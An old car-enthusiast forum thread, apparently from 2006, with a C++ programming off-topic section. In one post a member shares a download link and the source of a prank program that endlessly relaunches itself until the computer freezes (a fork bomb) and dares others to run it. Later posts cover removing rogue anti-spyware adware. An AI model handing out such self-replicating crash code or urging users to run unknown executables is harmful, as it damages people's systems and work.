Off Topic A place for you car junkies to boldly post off topic. Almost anything goes.

C++ Programming

Thread Tools
 
Search this Thread
 
Old Mar 31, 2006 | 05:14 PM
  #31  
mysterio2099's Avatar
Thread Starter
Joined: Nov 2005
Posts: 836
From:
Default RE: C++ Programming

DUDE THAT'S NUTS! LIKE, OMGOOSE! WOW!!! AHH!!!!!

...freaky deaky friday man.



 
Old Mar 31, 2006 | 05:15 PM
  #32  
EMonz57's Avatar
Senior Member
Joined: May 2005
Posts: 12,084
Default RE: C++ Programming

ya I dont know how it got on, but it is off once again
 
Old Mar 31, 2006 | 05:30 PM
  #33  
mysterio2099's Avatar
Thread Starter
Joined: Nov 2005
Posts: 836
From:
Default RE: C++ Programming

lol, hopefully it can stay that way

and to stay on topic.. if anyone would like to be ballzy and run this program I wrote up.. here's the link:

http://www.geocities.com/mystterio2099/clickme.zip (download, unzip, run .exe)

Basically, when you run it, it'll open itself a brazillion times, fill your memory, and freeze your computer.. no one has ever been able to stop it or restart properly after its ran.. it works too fast.. so, you're forced to shut down via power button. That's all it does... but its fun to watch your screen fill with DOS prompts.

Here's the code. There is a seperate file telling it what icon to attach, i didn't put that in here.

Code:
 #include <iostream>
 #define IDI_ICON1 1
 using namespace std;
 
 int keepAliveNum = 1;
 
 int main()
 {
 	while(keepAliveNum == 1)
 	{
 		system("start ClickMe.exe");
 	}
 	system("pause");
 }
ok, i'm done. lol

 
Old Mar 31, 2006 | 06:45 PM
  #34  
dirtwagon's Avatar
Joined: Dec 2005
Posts: 1,129
From:
Default RE: C++ Programming

Off topic a bit, but the computer savvy are checking out this thread, soooo-
Okay, now tell us how to get rid this annoying shyt that's floating around. I have a damn virus that tells me I have a virus and click here to download the antivirus...aka... give someone free access to all my files and junk like that. arrrgh, my antivirus won't kill it, I cannot get rid of it from the system folder cause it's in use, won't do it in safe mode either.P.S. it also gives me **** popups too.
 
Old Mar 31, 2006 | 06:50 PM
  #35  
mysterio2099's Avatar
Thread Starter
Joined: Nov 2005
Posts: 836
From:
Default RE: C++ Programming

This sounds more like spyware/adware.. Viruses do not have pop ups by nature... they more screw up your system files. So, you need to download a free program called Ad-Aware SE. Run that baby and delete everything it finds. If that program can't find it, I'm not too sure... but, I run that, my virus scan, and a defrag once a week, and I never have a single problem. Also be careful what wesbites you browse through... not sure what you look at, and don't want to know, but, just be very cautious.

Hope that helps.

---- Also, what did you mean by removing it from the system folder?.. does this mean you found a file? .. if so, what is it called?

 
Old Mar 31, 2006 | 07:25 PM
  #36  
dirtwagon's Avatar
Joined: Dec 2005
Posts: 1,129
From:
Default RE: C++ Programming

Have to look up everything again. I believe it was in the system32 folders, but I cannot delete it due to the fact that it has protected itself somehow. The nature of the programming is to give you **** popups and other junk like that, not from where you go. I usually am cautious with where I go and what emails I open. Back in January this was a pretty new problem without a definate cure.
I think the file was mssearchnet. I got the info from a website that was attempting to help people debug their comps from this.
 
Old Mar 31, 2006 | 07:27 PM
  #37  
mysterio2099's Avatar
Thread Starter
Joined: Nov 2005
Posts: 836
From:
Default RE: C++ Programming

This still sounds like spyware/adware to me. Get the Ad-Aware SE program I mentioned and run it.

 
Old Mar 31, 2006 | 07:31 PM
  #38  
dirtwagon's Avatar
Joined: Dec 2005
Posts: 1,129
From:
Default RE: C++ Programming

Will do, although the free downloads don't usually appeal to me...I always hear that's the birthplace of spyware.
 
Old Mar 31, 2006 | 07:58 PM
  #39  
mysterio2099's Avatar
Thread Starter
Joined: Nov 2005
Posts: 836
From:
Default RE: C++ Programming

Sooo... you ask the "computer savvy" for help, and then criticize the advise. Don't expect anymore help from me bud.


 
Old Mar 31, 2006 | 08:09 PM
  #40  
dirtwagon's Avatar
Joined: Dec 2005
Posts: 1,129
From:
Default RE: C++ Programming

Not criticising, just stating the preconceived notion that has been implanted into my little brain. I ran the program and it found the program that I couldn't get much help with and the updated versions of my spyware/antivirus didn't catch. It was SpyAxe and Spyware Strike...I'm pretty confident that those were it. So far, so good. Thanks for the reccomendation... I owe you!
 



All times are GMT -5. The time now is 05:09 PM.